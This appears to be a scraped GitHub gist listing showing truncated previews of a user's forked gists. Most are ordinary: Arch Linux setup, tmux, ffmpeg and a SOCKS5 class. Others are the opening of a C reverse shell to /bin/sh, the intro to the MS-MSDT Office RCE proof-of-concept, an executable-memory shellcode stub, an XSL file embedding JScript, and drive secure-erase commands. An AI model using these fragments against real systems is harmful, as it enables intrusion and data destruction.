Cerebral Mischief CerebralMischief

View GitHub Profile
// gcc -g -o L1 lin_1.c
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#define RP 1234
#define RH "127.0.0.1"
#define BIN "/bin/sh"
int main(){
int is = 0;is = socket(AF_INET,SOCK_STREAM,0);
struct sockaddr_in s1;
CerebralMischief / ms-msdt.MD
Created June 3, 2022 12:41 — forked from tothi/ms-msdt.MD
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme "ms-msdt:" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
CerebralMischief / Socks5.cs
Created January 30, 2021 13:54 — forked from zHaytam/Socks5.cs
A Socks5 implementation in .NET Core (C# 8)
using System;
using System.Globalization;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Threading.Tasks;
namespace Socks
{
public static class Socks5
CerebralMischief / arch-linux-install
Created September 19, 2019 20:22 — forked from welte/arch-linux-install
Minimal instructions for installing Arch Linux on a UEFI NVMe system with full system encryption using dm-crypt and LUKS
# Install ARCH Linux with encrypted file-system and UEFI
# The official installation guide (https://wiki.archlinux.org/index.php/Installation_Guide) contains a more verbose description.
# Download the archiso image from https://www.archlinux.org/
# Copy to a usb-drive
dd if=archlinux.img of=/dev/sdX bs=16M && sync # on linux
# Boot from the usb. If the usb fails to boot, make sure that secure boot is disabled in the BIOS configuration.
# Set swiss-french keymap
CerebralMischief / starttmux.sh
Created May 29, 2019 16:03 — forked from todgru/starttmux.sh
Start up tmux with custom windows, panes and applications running
#!/bin/sh
#
# Setup a work space called `work` with two windows
# first window has 3 panes.
# The first pane set at 65%, split horizontally, set to api root and running vim
# pane 2 is split at 25% and running redis-server
# pane 3 is set to api root and bash prompt.
# note: `api` aliased to `cd ~/path/to/work`
#
session="work"
CerebralMischief / arch-firstboot.md
Last active August 24, 2018 15:50 — forked from kevinwright/arch-firstboot.md
Arch first-boot configuration. Setup the first user, sudo, vm tools, and enough of a dev env to support AUR+yaourt

OpenSSH daemon

pacman -S openssh
systemctl start sshd
systemctl enable sshd.socket

Sudoers

CerebralMischief / proresproxy.sh
Created August 17, 2018 05:49 — forked from kevinwright/proresproxy.sh
Use ffmpeg to build prores proxies for Premiere Pro
#!/usr/bin/env bash
# Usage notes
# ===========
#
# proxy_watermark.png needs to be in the same directory as the script
# download from here: http://whoismatt.com/images/2016/7-july/adobe_proxy_logo.png
#
# on OSX, both pv and ffmpeg will need to be installed via homebrew
#!/usr/bin/bash
loadkeys fr
# ssd clearing (wiki.archlinux.org/index.php/SSD_memory_cell_clearing)
hdparm -I /dev/sda # and ensure the ssd is not frozen
hdparm --user-master u --security-set-pass MyPaSsWoRd /dev/sda
hdparm -I /dev/sda # in order to check
hdparm --user-master u --security-erase MyPaSsWoRd /dev/sda
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
int main(int argc, char **argv) {
unsigned char bytes[] = {
0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0xf3, 0x90, // rep*14 nop
0xc3 // ret
};
unsigned char *code = (unsigned char *) mmap(NULL, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC,
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:vb="urn:the-xml-files:xslt-vb" xmlns:user="placeholder" version="1.0">
<!-- Copyright (c) Microsoft Corporation. All rights reserved. -->
<xsl:output method="text" omit-xml-declaration="yes" indent="no"/>
<xsl:strip-space elements="*" />
<ms:script implements-prefix="user" language="JScript">
<![CDATA[